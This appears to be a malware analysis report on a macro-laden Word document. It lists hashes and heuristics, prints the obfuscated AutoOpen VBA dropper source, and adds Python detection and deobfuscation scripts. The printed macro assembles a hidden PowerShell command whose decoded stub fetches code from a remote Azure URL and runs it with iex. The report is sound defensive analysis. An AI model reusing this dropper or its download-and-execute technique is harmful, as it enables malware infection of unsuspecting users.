Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4153c71c8ff2957b…

MALICIOUS

Office (OLE)

Size: 283.0 KB
Created: 2018-02-13 13:59:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: d0c85598fd52856b53a57f5319fc1164
SHA-1: 3f0bcf9157b7d20022fe2effab241e0850bb9fc2
SHA-256: 4153c71c8ff2957b915cd632f53b6f782e465dfb445ef7fa5a93e8d017dbdfc6
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project defines an AutoOpen procedure, so the macro runs as soon as the file is opened with macros enabled, with no further user action. The recovered source (macros.bas below) builds its command line one character at a time from a fixed 20-entry character array; the part visible before the preview is cut off spells "powershell -windowstyle hidden -executionpolicy bypa". In parallel it concatenates two dozen short string literals into a single base64 blob. Decoded as UTF-16LE, the encoding PowerShell expects for an encoded command, the fragments visible in the preview yield a stub that defines a base64-to-string helper and passes the output of invoke-webrequest against https://usprd5150central.table.core.windows.net/warehouse (an Azure Table Storage endpoint, queried with a $filter on PartitionKey) to iex. The second stage is therefore fetched at run time rather than carried in the document. The Shell() call that launches the assembled command lies past the truncated preview and is evidenced on this page only by the OLE_VBA_SHELL heuristic. Together with the ClamAV signature this classifies the document as a macro dropper/downloader; the heuristics establish the behaviour, and the signature supplies only the generic Doc.Dropper.Agent name.

Heuristics (7)

  • CLAMAV_DETECTION, critical: ClamAV: Doc.Dropper.Agent-6449209-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449209-0
  • OLE_VBA_MACROS, medium (3 related findings): VBA macros detected
    The document contains VBA macro code.
  • OLE_VBA_SHELL, critical: Shell() call in VBA
    The macro calls the VBA Shell() function, which starts an external process. In this sample the command line is assembled from obfuscated fragments, so the process name never appears as a plain string in the source.
  • OLE_VBA_AUTOOPEN, high: AutoOpen macro
    The VBA project defines an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC, high: VBA p-code auto-exec with execution tokens
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents and documents whose source extraction fails, where no visible source is available.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC, medium: Legacy WordBasic auto-exec macro marker
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (In this sample a VBA project was in fact recovered, see the extracted macros.bas, so the marker is the same AutoOpen name and adds no independent evidence.)
  • EMBEDDED_URL, info: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace present in any Office document with drawing content, not an address the macro contacts. The real network indicator sits inside the base64 blob the macro assembles, which a URL extractor cannot see without decoding it.
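As an added illustration of how the rules above combine (illustrative code written for this report, not the scanner's implementation), the following Python triages a VBA source the way the OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC findings do: an auto-exec procedure name on its own is high, Shell() or an auto-exec name together with an execution token is critical. It also counts the one-character appends and short base64-alphabet literals this sample uses, because a string-token rule never sees the word "powershell" in such a macro. The sample macro inside it is constructed from the first lines of the macros.bas preview below plus an assumed Shell() line, since the real call is past the truncation point; the rule names, thresholds and severity ladder are this example's own choices.

```python
import re

# Procedure names Word/Excel run without user action; the sample uses AutoOpen.
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                  "Workbook_Open", "Auto_Open")
# Tokens for starting a process, instantiating COM objects or fetching a payload.
EXEC_TOKENS = ("Shell(", "WScript.Shell", "CreateObject(", "URLDownloadToFile",
               "powershell", "Invoke-WebRequest", "DownloadString", "XMLHTTP")

AUTOEXEC_RE = re.compile(r"\bSub\s+(" + "|".join(AUTOEXEC_NAMES) + r")\s*\(", re.I)
SHELL_RE = re.compile(r"\bShell\s*\(", re.I)
# One character per statement: X = X + ARR(n) or X = X & ARR(n)
CHAR_APPEND_RE = re.compile(r"^\s*(\w+)\s*=\s*\1\s*[+&]\s*\w+\(\d+\)\s*$", re.M)
# Quoted literals made only of the base64 alphabet, mixed case, 6 to 60 chars
B64_LITERAL_RE = re.compile(r'"(?=[^"]*[A-Z])(?=[^"]*[a-z])([A-Za-z0-9+/]{6,60})"')


def triage_vba(source):
    """Return (severity, findings); findings are (rule_id, detail) pairs in the
    order the rules fire. Thresholds and severities are this example's own."""
    findings = []
    auto = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)})
    if auto:
        findings.append(("OLE_VBA_AUTOEXEC", "auto-exec procedure: " + ", ".join(auto)))
    if SHELL_RE.search(source):
        findings.append(("OLE_VBA_SHELL", "Shell() starts an external process"))
    low = source.lower()
    exec_hits = [t for t in EXEC_TOKENS if t.lower() in low]
    if auto and exec_hits:
        findings.append(("OLE_VBA_AUTOEXEC_EXEC",
                         "auto-exec plus execution tokens: " + ", ".join(exec_hits)))
    appends = len(CHAR_APPEND_RE.findall(source))
    literals = len(B64_LITERAL_RE.findall(source))
    if appends >= 8 or literals >= 5:
        findings.append(("OLE_VBA_OBFUSCATION",
                         f"{appends} one-character appends, {literals} base64-like "
                         "literals: token rules may miss the real command"))
    ids = {rule for rule, _ in findings}
    if "OLE_VBA_AUTOEXEC_EXEC" in ids or "OLE_VBA_SHELL" in ids:
        severity = "critical"
    elif "OLE_VBA_AUTOEXEC" in ids:
        severity = "high"
    elif ids:
        severity = "medium"
    else:
        severity = "info"
    return severity, findings


# Constructed sample modelled on the extracted macro: the array, the first six
# base64 fragments and the first ten EM_QB lookups are copied from the preview.
# The Call Shell(...) line is an assumption; the real call is past the cut-off.
SAMPLE_VBA = (
    'Attribute VB_Name = "hometown"\n'
    "Sub AutoOpen()\n"
    '    EM_QB = Array("c", "x", "i", "d", "h", "r", "b", "t", "-", "l", '
    '"a", "y", "u", "s", "p", "e", "n", "o", " ", "w")\n'
    '    FT_RC = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQ"\n'
    '    HK_MI = "AeAApAHsAcgBlAH"\n'
    '    FN_ND = "QAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABl"\n'
    '    EL_TD = "AHgAdAAu"\n'
    '    DO_LE = "AEUAbgBjAG8AZABp"\n'
    '    HO_TD = "AG4AZwBdADoA"\n'
    + "".join(f"    CM_LE = CM_LE + EM_QB({i})\n"
              for i in (14, 17, 19, 15, 5, 13, 4, 15, 9, 9))
    + "    FP_MF = FP_MF & FT_RC & HK_MI & FN_ND & EL_TD & DO_LE & HO_TD\n"
    '    Call Shell(CM_LE & " -enc " & FP_MF, 0)\n'
    "End Sub\n"
)

# Constructed benign macro for comparison: no auto-exec name, no execution token.
BENIGN_VBA = 'Sub FormatTable()\n    Selection.Font.Bold = True\n    MsgBox "done"\nEnd Sub\n'

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        severity, findings = triage_vba(src)
        print(name, severity)
        for rule, detail in findings:
            print("  ", rule, "-", detail)
```

The point of the last rule is visible in the sample: "powershell" is absent from the source text, so only the AutoOpen name and the Shell() call fire the strong rules, and the obfuscation counters are what tell the analyst that a decoded view of the strings is needed before trusting any token-based verdict.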

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6270 bytes
SHA-256: c8f19aa8467d8a027627a5a7513d6db4f7fbdd236a1f2ed2ecf17c98525beea5

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hometown"
Sub AutoOpen()
    Dim CM_LE As String
    EM_QB = Array("c", "x", "i", "d", "h", "r", "b", "t", "-", "l", "a", "y", "u", "s", "p", "e", "n", "o", " ", "w")
    Dim FT_RC As String
    FT_RC = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQ"
    CM_LE = CM_LE + EM_QB(14)
    CM_LE = CM_LE + EM_QB(17)
    Dim HK_MI As String
    HK_MI = "AeAApAHsAcgBlAH"
    CM_LE = CM_LE + EM_QB(19)
    CM_LE = CM_LE + EM_QB(15)
    Dim FN_ND As String
    FN_ND = "QAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABl"
    CM_LE = CM_LE + EM_QB(5)
    CM_LE = CM_LE + EM_QB(13)
    Dim EL_TD As String
    EL_TD = "AHgAdAAu"
    CM_LE = CM_LE + EM_QB(4)
    CM_LE = CM_LE + EM_QB(15)
    Dim DO_LE As String
    DO_LE = "AEUAbgBjAG8AZABp"
    FP_MF = FP_MF & FT_RC & HK_MI & FN_ND & EL_TD & DO_LE
    CM_LE = CM_LE + EM_QB(9)
    CM_LE = CM_LE + EM_QB(9)
    Dim HO_TD As String
    HO_TD = "AG4AZwBdADoA"
    CM_LE = CM_LE + EM_QB(18)
    CM_LE = CM_LE + EM_QB(8)
    Dim EL_TH As String
    EL_TH = "OgBVAFQARgA4AC4ARw"
    CM_LE = CM_LE + EM_QB(19)
    CM_LE = CM_LE + EM_QB(2)
    Dim HL_SF As String
    HL_SF = "BlAHQAUwB0AHI"
    CM_LE = CM_LE + EM_QB(16)
    CM_LE = CM_LE + EM_QB(3)
    Dim FM_QB As String
    FM_QB = "AaQBuAGcAKABbAFMAeQBzAHQAZQBtAC"
    CM_LE = CM_LE + EM_QB(17)
    CM_LE = CM_LE + EM_QB(19)
    Dim AS_NC As String
    AS_NC = "4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIA"
    FP_MF = FP_MF & HO_TD & EL_TH & HL_SF & FM_QB & AS_NC
    CM_LE = CM_LE + EM_QB(13)
    CM_LE = CM_LE + EM_QB(7)
    Dim AP_KH As String
    AP_KH = "bwBtAEIAYQBzAGUANgA0AFMAdAByAGk"
    CM_LE = CM_LE + EM_QB(11)
    CM_LE = CM_LE + EM_QB(9)
    Dim FR_NA As String
    FR_NA = "AbgBnACgAJAB4ACkAKQB9A"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(18)
    Dim IR_RF As String
    IR_RF = "DsAaQBlAHgAIAAkACgAYQAgACQAKAAkACg"
    CM_LE = CM_LE + EM_QB(4)
    CM_LE = CM_LE + EM_QB(2)
    Dim BP_TF As String
    BP_TF = "AJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQ"
    CM_LE = CM_LE + EM_QB(3)
    CM_LE = CM_LE + EM_QB(3)
    Dim BO_OJ As String
    BO_OJ = "BlAHMAd"
    FP_MF = FP_MF & AP_KH & FR_NA & IR_RF & BP_TF & BO_OJ
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(16)
    Dim GO_RD As String
    GO_RD = "AAgACcAaAB0A"
    CM_LE = CM_LE + EM_QB(18)
    CM_LE = CM_LE + EM_QB(8)
    Dim DO_TJ As String
    DO_TJ = "HQAcABz"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(1)
    Dim CT_MB As String
    CT_MB = "ADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZ"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(0)
    Dim HS_PD As String
    HS_PD = "QBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4"
    CM_LE = CM_LE + EM_QB(12)
    CM_LE = CM_LE + EM_QB(7)
    Dim DK_MC As String
    DK_MC = "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
    FP_MF = FP_MF & GO_RD & DO_TJ & CT_MB & HS_PD & DK_MC
    CM_LE = CM_LE + EM_QB(2)
    CM_LE = CM_LE + EM_QB(17)
    Dim IM_ME As String
    IM_ME = "QBzAGUAP"
    CM_LE = CM_LE + EM_QB(16)
    CM_LE = CM_LE + EM_QB(14)
    Dim BR_PC As String
    BR_PC = "wAkAGYAaQBsAHQAZQByAD0AUABhAHI"
    CM_LE = CM_LE + EM_QB(17)
    CM_LE = CM_LE + EM_QB(9)
    Dim FO_TI As String
    FO_TI = "AdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZQBxACUAM"
    CM_LE = CM_LE + EM_QB(2)
    CM_LE = CM_LE + EM_QB(0)
    Dim CT_RE As String
    CT_RE = "gAwACUAMgA3A"
    CM_LE = CM_LE + EM_QB(11)
    CM_LE = CM_LE + EM_QB(18)
    Dim AT_RC As String
    AT_RC = "HMAdABhAGcAZQAlADIANwAmAC"
    FP_MF = FP_MF & IM_ME & BR_PC & FO_TI & CT_RE & AT_RC
    CM_LE = CM_LE + EM_QB(6)
    CM_LE = CM_LE + EM_QB(11)
    Dim CL_PF As String
    CL_PF = "QAUwBlAGwAZQBjAHQAPQBk"
    CM_LE = CM_LE + EM_QB(14)
    CM_LE = CM_LE + EM_QB(10)
    Dim FS_LH As String
... (truncated)
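To confirm what the macro above actually executes, here is an added deobfuscation script written for this report (it is not part of the sample or of the analysis tool). It replays the two string-building tricks visible in the preview: the EM_QB(n) lookups that spell the command line one character at a time, and the FP_MF concatenation of base64 literals, which it decodes as UTF-16LE because that is the encoding PowerShell expects for an encoded command. The character table, the index list and the fragments are copied from the lines shown above; fragments declared after the last visible FP_MF append (CL_PF onwards) are left out because the statement that joins them lies past the cut-off, so the recovered PowerShell ends where the page does.

```python
import base64
import re
from urllib.parse import urlsplit

# Character table copied from the EM_QB = Array(...) line of the extracted macro.
CHAR_TABLE = ["c", "x", "i", "d", "h", "r", "b", "t", "-", "l",
              "a", "y", "u", "s", "p", "e", "n", "o", " ", "w"]

# The EM_QB(n) indices appended to CM_LE, in the order they occur in the preview.
# The preview stops mid-macro, so the rebuilt command line is cut off as well.
CM_LE_INDICES = [14, 17, 19, 15, 5, 13, 4, 15, 9, 9, 18, 8, 19, 2, 16, 3, 17, 19, 13,
                 7, 11, 9, 15, 18, 4, 2, 3, 3, 15, 16, 18, 8, 15, 1, 15, 0, 12, 7, 2,
                 17, 16, 14, 17, 9, 2, 0, 11, 18, 6, 11, 14, 10]

# Base64 literals in the order the visible FP_MF = FP_MF & ... statements join them.
# CL_PF and later literals are declared but their append statement is truncated.
FP_MF_FRAGMENTS = [
    "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQ", "AeAApAHsAcgBlAH",
    "QAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABl", "AHgAdAAu", "AEUAbgBjAG8AZABp",
    "AG4AZwBdADoA", "OgBVAFQARgA4AC4ARw", "BlAHQAUwB0AHI",
    "AaQBuAGcAKABbAFMAeQBzAHQAZQBtAC", "4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIA",
    "bwBtAEIAYQBzAGUANgA0AFMAdAByAGk", "AbgBnACgAJAB4ACkAKQB9A",
    "DsAaQBlAHgAIAAkACgAYQAgACQAKAAkACg", "AJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQ",
    "BlAHMAd", "AAgACcAaAB0A", "HQAcABz", "ADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZ",
    "QBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4",
    "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad", "QBzAGUAP",
    "wAkAGYAaQBsAHQAZQByAD0AUABhAHI", "AdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZQBxACUAM",
    "gAwACUAMgA3A", "HMAdABhAGcAZQAlADIANwAmAC",
]


def rebuild_indexed_string(indices, table):
    """Replay the CM_LE = CM_LE + EM_QB(n) appends: each index picks one character."""
    return "".join(table[i] for i in indices)


def decode_utf16le_base64(fragments):
    """Join the fragments and decode them the way PowerShell's -EncodedCommand
    does: base64 over UTF-16LE. Because the macro is cut off, the joined text may
    end inside a base64 quantum or inside a UTF-16 code unit; both tails are dropped
    rather than guessed."""
    joined = "".join(fragments)
    joined = joined[: len(joined) - len(joined) % 4]
    raw = base64.b64decode(joined)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def network_indicators(command):
    """Pull URLs out of the decoded command and return (url, host) pairs."""
    urls = re.findall(r"https?://[^\s'\"]+", command)
    return [(u, urlsplit(u).hostname) for u in urls]


if __name__ == "__main__":
    print("command line (partial):", rebuild_indexed_string(CM_LE_INDICES, CHAR_TABLE))
    decoded = decode_utf16le_base64(FP_MF_FRAGMENTS)
    print("decoded PowerShell (partial):", decoded)
    for url, host in network_indicators(decoded):
        print("contacts:", host, "via", url)
```

Run stand-alone it prints the partial command line, the decoded PowerShell stub (a base64-to-string helper whose result is handed to iex, fed by invoke-webrequest) and the host the stub contacts. The Shell() call that ties the two strings together is not in the preview and the OLE_VBA_SHELL heuristic is the only evidence on the page for it, which is why the two halves are reported separately here rather than as one command.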